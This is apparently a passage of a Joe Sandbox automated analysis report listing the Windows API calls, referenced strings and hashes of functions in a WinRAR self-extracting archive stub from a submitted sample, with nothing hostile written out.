GetCommandLineW.KERNEL32 ref: 0013DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0013DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0013DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0013DFCE

Part of subcall function 0013DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0013DBF4
Part of subcall function 0013DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0013DC30

CloseHandle.KERNEL32(00000000), ref: 0013DFD7
GetModuleFileNameW.KERNEL32(00000000,0017EC90,00000800), ref: 0013DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0017EC90), ref: 0013DFFE
GetLocalTime.KERNEL32(?), ref: 0013E009
_swprintf.LIBCMT ref: 0013E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0013E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0013E061
LoadIconW.USER32(00000000,00000064), ref: 0013E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0013E0C9
Sleep.KERNEL32(?), ref: 0013E0F7
DeleteObject.GDI32 ref: 0013E130
DeleteObject.GDI32(?), ref: 0013E140
CloseHandle.KERNEL32 ref: 0013E183

Strings

C:\Users\user\Desktop, xrefs: 0013DF33
sfxname, xrefs: 0013DFF9
STARTDLG, xrefs: 0013E0BE
sfxstime, xrefs: 0013E055
winrarsfxmappingfile.tmp, xrefs: 0013DF77
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0013E039

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 9153b93b93e1b167c10fc5c16e3d5323f6e22d82a63b605ef426fb5fa74e33c1
Instruction ID: 9fa75f397715a706ffa89b61e2b64a7f676d4cc38a09ec38a0315442b8b0ffcb
Opcode Fuzzy Hash: 9153b93b93e1b167c10fc5c16e3d5323f6e22d82a63b605ef426fb5fa74e33c1
Instruction Fuzzy Hash: 0961E471904305AFD720AB74EC89F2B7BECEB58741F040429F949976E1DBB499C8C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0013A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0013B73D,00000066), ref: 0013A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0013B73D,00000066), ref: 0013A6EC
LoadResource.KERNEL32(00000000,?,?,?,0013B73D,00000066), ref: 0013A703
LockResource.KERNEL32(00000000,?,?,?,0013B73D,00000066), ref: 0013A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0013B73D,00000066), ref: 0013A72D
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0013B73D,00000066), ref: 0013A73E
GlobalUnlock.KERNEL32(00000000), ref: 0013A7C6

Part of subcall function 0013A626: GdipAlloc.GDIPLUS(00000010), ref: 0013A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0013A7A7
GlobalFree.KERNEL32(00000000), ref: 0013A7CD

Strings

PNG, xrefs: 0013A6C6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 35b904ff60c36f35590c4a596e1cdeabe89ed16fd210cfbaf32af9adddaa76a4
Instruction ID: 8ad9138983e6ea9ed8d0aecbb6be48a51146145a2ee7870c80b7ef461fe61b85
Opcode Fuzzy Hash: 35b904ff60c36f35590c4a596e1cdeabe89ed16fd210cfbaf32af9adddaa76a4
Instruction Fuzzy Hash: 0F318F76600702EFD7119F31ECC8D1BBBB9EF84791F040519F95587A60EB32D984DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A6C4

Part of subcall function 0012BB03: _wcslen.LIBCMT ref: 0012BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A728
GetLastError.KERNEL32(?,?,?,?,0012A592,000000FF,?,?), ref: 0012A734

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 4747e8e61ac9bbd364d485d2ef37b69563bae6a8f05fb5f0c011c12eac6a24ea
Instruction ID: e3422c5707f34f4c3323ea66c710a10c0dce50fd81a63efbc186f8edfd5caf84
Opcode Fuzzy Hash: 4747e8e61ac9bbd364d485d2ef37b69563bae6a8f05fb5f0c011c12eac6a24ea
Instruction Fuzzy Hash: 13416E72900625ABCB25DF68DC84AEAF7B8FF48350F504196F56AE3240D7346EA0CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00147DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00147DC4,00000000,0015C300,0000000C,00147F1B,00000000,00000002,00000000), ref: 00147E0F
TerminateProcess.KERNEL32(00000000,?,00147DC4,00000000,0015C300,0000000C,00147F1B,00000000,00000002,00000000), ref: 00147E16
ExitProcess.KERNEL32 ref: 00147E28

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f7d5f8c01100bb6e7b73ab22c1af62f8a0c7b394076ac9604874e0ea05fa6171
Instruction ID: 64e043249f52286915e52063a14b1c9d319f7cc0f275522c546c833a03ee2e48
Opcode Fuzzy Hash: f7d5f8c01100bb6e7b73ab22c1af62f8a0c7b394076ac9604874e0ea05fa6171
Instruction Fuzzy Hash: 54E04631004248EFCF026F20DD49A8A7F6AEB10382B004454F8299B5B2CB36DE92CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0012848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00128493

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6edc66d3026ec027f92b42f3f1716e370d6f1b6400e07dc0d1a7415887316b02
Instruction ID: c52d775fc2e45c0d80266acd476f83e29942c3475762d6d9724ffeaaae7f9e65
Opcode Fuzzy Hash: 6edc66d3026ec027f92b42f3f1716e370d6f1b6400e07dc0d1a7415887316b02
Instruction Fuzzy Hash: 49824F70905265AEDF15DF64E891BFEB7B9BF15300F0841B9E8499B183DF305AA8CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0013B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0013B7E5

Part of subcall function 00121316: GetDlgItem.USER32(00000000,00003021), ref: 0012135A
Part of subcall function 00121316: SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013B8EF
IsDialogMessageW.USER32(?,?), ref: 0013B902
TranslateMessage.USER32(?), ref: 0013B910
DispatchMessageW.USER32(?), ref: 0013B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0013B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0013B960
GetDlgItem.USER32(?,00000068), ref: 0013B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013B99E
SendMessageW.USER32(00000000,000000C2,00000000,001535F4), ref: 0013B9B1

Part of subcall function 0013D453: _wcslen.LIBCMT ref: 0013D47D

SetFocus.USER32(00000000), ref: 0013B9B8
_swprintf.LIBCMT ref: 0013BA24

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

Part of subcall function 0013D4D4: GetDlgItem.USER32(00000068,0017FCB8), ref: 0013D4E8
Part of subcall function 0013D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0013AF07,00000001,?,?,0013B7B9,0015506C,0017FCB8,0017FCB8,00001000,00000000,00000000), ref: 0013D510
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013D51B
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001535F4), ref: 0013D529
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013D53F
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0013D559
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013D59D
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0013D5AB
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013D5BA
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013D5E1
Part of subcall function 0013D4D4: SendMessageW.USER32(00000000,000000C2,00000000,001543F4), ref: 0013D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0013BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0013BA90
GetTickCount.KERNEL32 ref: 0013BAAE
_swprintf.LIBCMT ref: 0013BAC2
GetLastError.KERNEL32(?,00000011), ref: 0013BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0013BB43
_swprintf.LIBCMT ref: 0013BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0013BBD0
GetCommandLineW.KERNEL32 ref: 0013BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0013BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0013BC6F
Sleep.KERNEL32(00000064), ref: 0013BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0013BCE2
CloseHandle.KERNEL32(00000000), ref: 0013BCEB
_swprintf.LIBCMT ref: 0013BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013BD7D
SetDlgItemTextW.USER32(?,00000065,001535F4), ref: 0013BD94
GetDlgItem.USER32(?,00000065), ref: 0013BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0013BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0013BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013BE68
_wcslen.LIBCMT ref: 0013BEBE
_swprintf.LIBCMT ref: 0013BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0013BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0013BF4C
GetDlgItem.USER32(?,00000068), ref: 0013BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0013BF6B
GetDlgItem.USER32(?,00000066), ref: 0013BF85
SetWindowTextW.USER32(00000000,0016A472), ref: 0013BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0013C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0013C0BD
EnableWindow.USER32(00000000,00000000), ref: 0013C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0013C1D9

Part of subcall function 0013C73F: __EH_prolog.LIBCMT ref: 0013C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013C1FD

Strings

C:\Users\user\Desktop, xrefs: 0013BBC9
LICENSEDLG, xrefs: 0013C0B2
"%s"%s, xrefs: 0013BD0D
STARTDLG, xrefs: 0013B801
%s, xrefs: 0013BED8
@, xrefs: 0013BB91
<, xrefs: 0013BB84
__tmp_rar_sfx_access_check_%u, xrefs: 0013BAB5
winrarsfxmappingfile.tmp, xrefs: 0013BBA6
-el -s2 "-d%s" "-sp%s", xrefs: 0013BB6B

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 8007bb31aa949d92af2fa15f860808885f29ccff4e1042a089079dec4ea974f3
Instruction ID: ce56618f547ba19299f067544a86598b1b959edc0facc2b4ef1ee2ca50879807
Opcode Fuzzy Hash: 8007bb31aa949d92af2fa15f860808885f29ccff4e1042a089079dec4ea974f3
Instruction Fuzzy Hash: EE421771944358FEEB219B70DC8AFBE7BBCAB11B00F040155F645BA4D2DBB49A84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00130863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0013087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0013088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001308BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00130B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00130B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00130B93
ReadFile.KERNEL32(00000000,?,00007FFE,00153C7C,00000000), ref: 00130BB1
CloseHandle.KERNEL32(00000000), ref: 00130C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00130C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00153C7C,?,00000000,?,00000800), ref: 00130C72
GetFileAttributesW.KERNELBASE(?,?,00153C7C,00000800,?,00000000,?,00000800), ref: 00130C9C
GetFileAttributesW.KERNEL32(?,?,00153D44,00000800), ref: 00130CD8

Part of subcall function 0013081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00130836
Part of subcall function 0013081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0012F2D8,Crypt32.dll,00000000,0012F35C,?,?,0012F33E,?,?,?), ref: 00130858

_swprintf.LIBCMT ref: 00130D4A
_swprintf.LIBCMT ref: 00130D96

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

AllocConsole.KERNEL32 ref: 00130D9E
GetCurrentProcessId.KERNEL32 ref: 00130DA8
AttachConsole.KERNEL32(00000000), ref: 00130DAF
_wcslen.LIBCMT ref: 00130DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00130DD5
WriteConsoleW.KERNEL32(00000000), ref: 00130DDC
Sleep.KERNEL32(00002710), ref: 00130DE7
FreeConsole.KERNEL32 ref: 00130DED
ExitProcess.KERNEL32 ref: 00130DF5

Strings

kernel32, xrefs: 00130873
SetDefaultDllDirectories, xrefs: 001308B9
dwmapi.dll, xrefs: 00130927, 00130D0D
DXGIDebug.dll, xrefs: 001308FC, 00130C5E
SetDllDirectoryW, xrefs: 00130888
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00130D84
uxtheme.dll, xrefs: 00130D17

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 13438a4ce89705a468494d141ef0c76ee55cadfabc0cd33421a066a796d7cd96
Instruction ID: eeb7c2266afdc48e9e212aeb4e8263fc84234541438cea320adc6d0aa0eb38bd
Opcode Fuzzy Hash: 13438a4ce89705a468494d141ef0c76ee55cadfabc0cd33421a066a796d7cd96
Instruction Fuzzy Hash: 8ED183B1008344EBD321DF50D959A9FBAF8BB85746F50491DF9B9AF180C7B0968CCB52

Uniqueness

Uniqueness Score: -1.00%

Function 0013C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0013C744

Part of subcall function 0013B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0013B3FB

_wcslen.LIBCMT ref: 0013CA0A
_wcslen.LIBCMT ref: 0013CA13
SetWindowTextW.USER32(?,?), ref: 0013CA71
_wcslen.LIBCMT ref: 0013CAB3
_wcsrchr.LIBVCRUNTIME ref: 0013CBFB
GetDlgItem.USER32(?,00000066), ref: 0013CC36
SetWindowTextW.USER32(00000000,?), ref: 0013CC46
SendMessageW.USER32(00000000,00000143,00000000,0016A472), ref: 0013CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0013CC7F

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0013CB1A
%s.%d.tmp, xrefs: 0013C940
ProgramFilesDir, xrefs: 0013CB45
<br>, xrefs: 0013C9D4

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: e9daec64f9536f057223f187fa0ab343fb72ef8fccb98c99ecf18af58024fdf8
Instruction ID: 1d465c61349486c263919b77853f8d42f7e2199245e6af5a8cb0b9133464ac08
Opcode Fuzzy Hash: e9daec64f9536f057223f187fa0ab343fb72ef8fccb98c99ecf18af58024fdf8
Instruction Fuzzy Hash: 2EE142B2900219AADF25DBA4EC85EEE73BCAF14350F4440A6F659F7050EB749F848F60

Uniqueness

Uniqueness Score: -1.00%

Function 0012DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0012DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0012DAAC

Part of subcall function 0012C29A: _wcslen.LIBCMT ref: 0012C2A2

Part of subcall function 001305DA: _wcslen.LIBCMT ref: 001305E0

Part of subcall function 00131B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0012BAE9,00000000,?,?,?,00010440), ref: 00131BA0

_wcslen.LIBCMT ref: 0012DDE9
__fprintf_l.LIBCMT ref: 0012DF1C

Strings

a, xrefs: 0012DC16
R, xrefs: 0012DC0C
RTL, xrefs: 0012DEDE
*messages***, xrefs: 0012DBFA
, xrefs: 0012DD6C
$%s:, xrefs: 0012DEFF
,, xrefs: 0012DF57
@%s:, xrefs: 0012DF06, 0012DF12
*messages***, xrefs: 0012DBC1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 05daeefe8c7cb34b0db7ce49595d96f1c5b2ebe40bacf1b46b582a56201f21d5
Instruction ID: 99c2e7f74060bc974ca36012ffc6f21f8a6b1c5a2be2e35b85e521d591a028d7
Opcode Fuzzy Hash: 05daeefe8c7cb34b0db7ce49595d96f1c5b2ebe40bacf1b46b582a56201f21d5
Instruction Fuzzy Hash: 0932F371A00228DBDF28EF68E841BEE77A5FF15304F41012AF9069B291E7B1DDA5CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0013D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0013B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013B579
Part of subcall function 0013B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013B58A
Part of subcall function 0013B568: IsDialogMessageW.USER32(00010440,?), ref: 0013B59E
Part of subcall function 0013B568: TranslateMessage.USER32(?), ref: 0013B5AC
Part of subcall function 0013B568: DispatchMessageW.USER32(?), ref: 0013B5B6

GetDlgItem.USER32(00000068,0017FCB8), ref: 0013D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0013AF07,00000001,?,?,0013B7B9,0015506C,0017FCB8,0017FCB8,00001000,00000000,00000000), ref: 0013D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013D51B
SendMessageW.USER32(00000000,000000C2,00000000,001535F4), ref: 0013D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0013D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0013D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013D5E1
SendMessageW.USER32(00000000,000000C2,00000000,001543F4), ref: 0013D5F0

Strings

\, xrefs: 0013D549

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

